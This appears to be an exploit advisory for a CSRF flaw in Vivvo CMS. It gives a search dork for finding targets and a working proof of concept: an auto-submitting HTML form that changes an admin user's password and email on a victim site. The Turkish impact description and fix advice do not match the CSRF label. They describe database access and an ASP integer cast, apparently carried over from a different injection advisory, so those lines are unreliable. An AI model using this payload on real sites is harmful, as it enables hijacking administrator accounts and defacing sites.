< ------------------- header data start ------------------- >

#############################################################

# Application Name : Vivvo Cms

# Vulnerable Type : CSRF

# Google Keyword : Powered by Vivvo

# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.

# Bug Fix Advice : id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir.
Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: id = Cint(Request.QueryString(id))

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<html><bOdy>
<form action=http://victim/admin/user_edit.php?search_id=2 method=post enctype=multipart/form-data>
<input type=hidden name=action value=user />
<input type=hidden name=cmd value=edit />
<input type=hidden name=USER_id value=id />
<input type=text class=text name=USER_first_name value=crazy />
<input type=password class=text name=USER_password value=1234567 />
<input type=password class=text name=USER_retype_password value=1234567 />
<input type=text class=text name=USER_email_address value=[email protected] />
<script>document.forms[0].submit() </script></form>
</bOdy></html>

< -- bug code end of -- >